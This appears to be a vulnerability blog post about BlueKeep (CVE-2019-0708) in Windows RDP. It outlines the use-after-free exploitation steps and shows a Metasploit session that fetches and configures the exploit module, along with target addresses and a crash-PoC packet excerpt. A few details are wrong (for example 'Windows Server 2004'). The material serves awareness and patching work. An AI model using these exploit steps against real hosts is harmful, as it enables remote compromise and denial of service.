Bluekeep the 2019 EternalBlue

We had a discussion about what was the most critical vulnerability

of 2019. After a heated debate we asked some friends and we managed to

cherry pick one. The choicen one is Bluekeep .

Summary:

Bluekeep is one of the most notorious software security vulnerabilities

of 2019. Bluekeep was discovered by the United kingdom’s

Nation Cyber Security Center and publicly announced by Microsoft in

Mars 2019 as serious vulnerability for RDP.

Microsoft considered the vulnerability so serious they decided to

release patches for the inactive systems Windows XP and Windows Server 2003.

Affecting:

Windows 7

Windows Server 2008

Windows Vista

Windows Server 2004

Windows Server 2003

Windows XP

systems that has RDP(Remote desktop protocol) enabled

The vulnerability has been given the CVE of CVE-2019-0708

Explanation of the vulnerability

This is a use after free vulnerability that

could be exploited by

Creating a RDP connection with the MS_T120 virtual channel.



Start a heap spray



Invoke allocations via call to ExAllocatePoolWithTag in IcaChannelInputInternal such that the freed memory space is occupied with our data.



Control the EIP(Extended Instruction Pointer, this is a memory address registry)



Cause the UAF condition and execute your ring 0 shell code



Proof of concept

Metasploit has started to work on implementing bluekeep in metasploit. This sets an important mile stone for Metasploit

that added bluekeep as its first Windows RDP exploit. You can download the exploit here and try it with metasploit.

root@kali:/usr/share/metasploit-framework/modules/exploits/windows/rdp# pwd /usr/share/metasploit-framework/modules/exploits/windows/rdp root@kali:/usr/share/metasploit-framework/modules/exploits/windows/rdp# wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb root@kali:~# msfconsole [*] Starting the Metasploit Framework console...\ _ _ / \ /\ __ _ __ /_/ __ | |\ / | _____ \ \ ___ _____ | | / \ _ \ \ | | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -| |_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_ |/ |____/ \___\/ /\ \\___/ \/ \__| |_\ \___\ =[ metasploit v5.0.46-dev ] + -- --=[ 1922 exploits - 1074 auxiliary - 330 post ] + -- --=[ 556 payloads - 45 encoders - 10 nops ] + -- --=[ 4 evasion ] msf5 > msf5 > search bluekeep Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/scanner/rdp/cve_2019_0708_bluekeep 2019-05-14 normal Yes CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE Check 1 exploit/windows/rdp/cve_2019_0708_bluekeep_rce 2019-05-14 manual Yes CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free msf5 > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show options Module options (exploit/windows/rdp/cve_2019_0708_bluekeep_rce): Name Current Setting Required Description ---- --------------- -------- ----------- RDP_CLIENT_IP 192.168.0.100 yes The client IPv4 address to report during c onnect RDP_CLIENT_NAME ethdev no The client computer name to report during connect, UNSET = random RDP_DOMAIN no The client domain name to report during co nnect RDP_USER no The username to report during connect, UNS ET = random RHOSTS yes The target address range or CIDR identifie r RPORT 3389 yes The target port (TCP) Exploit target: Id Name -- ---- 0 Automatic targeting via fingerprinting root@kali:~# cat -n /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb 106 # Windows 2008 R2 requires the following registry change from default: 107 # 108 # [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\rdpwd] 109 # "fDisableCam"=dword:00000000 110 # 111 [ 112 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64)', 113 { 114 'Platform' => 'win', 115 'Arch' => [ARCH_X64], 116 'GROOMBASE' => 0xfffffa8003800000 117 } 118 ], 119 [ 120 # This works with Virtualbox 6 121 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox)', 122 { 123 'Platform' => 'win', 124 'Arch' => [ARCH_X64], 125 'GROOMBASE' => 0xfffffa8002407000 126 } 127 ], 128 [ 129 # This address works on VMWare 15 on Windows. 130 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare)', 131 { 132 'Platform' => 'win', 133 'Arch' => [ARCH_X64], 134 'GROOMBASE' => 0xfffffa8018C00000 135 #'GROOMBASE' => 0xfffffa801C000000 136 } 137 ], 138 [ 139 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)', 140 { 141 'Platform' => 'win', 142 'Arch' => [ARCH_X64], 143 'GROOMBASE' => 0xfffffa8102407000 144 } 145 ], 146 ],

The community is working on adding support for more Windows NPP addresses.

Pentest-tools.com has writen a guide on how to get the exploit working

Blue screen of death PoC

A proof of concept was published on github.com/Ekultek/BlueKeep that when executed it will the kernel to crash and cause a blue screen of

death.



Log files

When the exploit script is being executed it will send the authentication package:

https://github.com/Ekultek/BlueKeep/blob/master/bluekeep_poc.py#L119

def client_info_pdu(): packet = ( "0300016102f08064000703eb7081524000a1a509040904bb47030000000e00080000000000000042007200770041006600660079"# here is the username defined | 42727741666679 is BrwAffy | this can be changed , as a poc of this we changed it to firo #firo isn hexadecimal is 6669726F and then we need to fill out the buffer so we add some zeros and up with the result 6600690072006F000D000A0000 and the new string would look like 0300016102f08064000703eb7081524000a1a509040904bb47030000000e0008000000000000006600690072006F000D000A0000 "000000740074007400740000000000000002001c00310030002e0030002e0030002e003700360000000000000000000000400043" #tttt10.0.0.76@C "003a005c00570049004e0044004f00570053005c00730079007300740065006d00330032005c006d007300740073006300610078" #:\WINDOWS\x00system32\mstscax "002e0064006c006c000000a40100004d006f0075006e007400610069006e0020005300740061006e006400610072006400200054" #.dll a Mountain Standard T "0069006d006500000000000000000000000000000000000000000000000b00000001000200000000000000000000004d006f0075" "006e007400610069006e0020004400610079006c0069006700680074002000540069006d00650000000000000000000000000000" "0000000000000000000300000002000200000000000000c4ffffff0100000006000000000064000000" )

Scammers profiting off the vulnerability

Several people are claiming to have successfully created a PoC

for this vulnerability. Like:

rdpexploit[.]com

cve-2019-0708[.]info

buyexploit[.]com

Vulnerable hosts

Robert david graham has released a scanner for detecting this vulnerability and he has published a blog posts claiming that

over 9 million internet facing hosts are vulnerable. Read it here

External links:

EternalBlue

Microsoft CVE-2019-0708 Advisory Nation Cyber Security Center vulnerability annoncement

Zero day initiative’s write up

Packet Storm Security CVE-2019-0708

Sophos Bluekeep PoC

CVE-2019-0708 vulmon

Algo7 PoC Windows Protection ring

Metasploit pull request #12283 for bluekeep

Metasploit announce the release of bluekeep

Stay up to date with Vulnerability Management and build cool things with our API

This blog post is part of the exploit of the day series

where we write a shorter description about interesting

exploits that we index.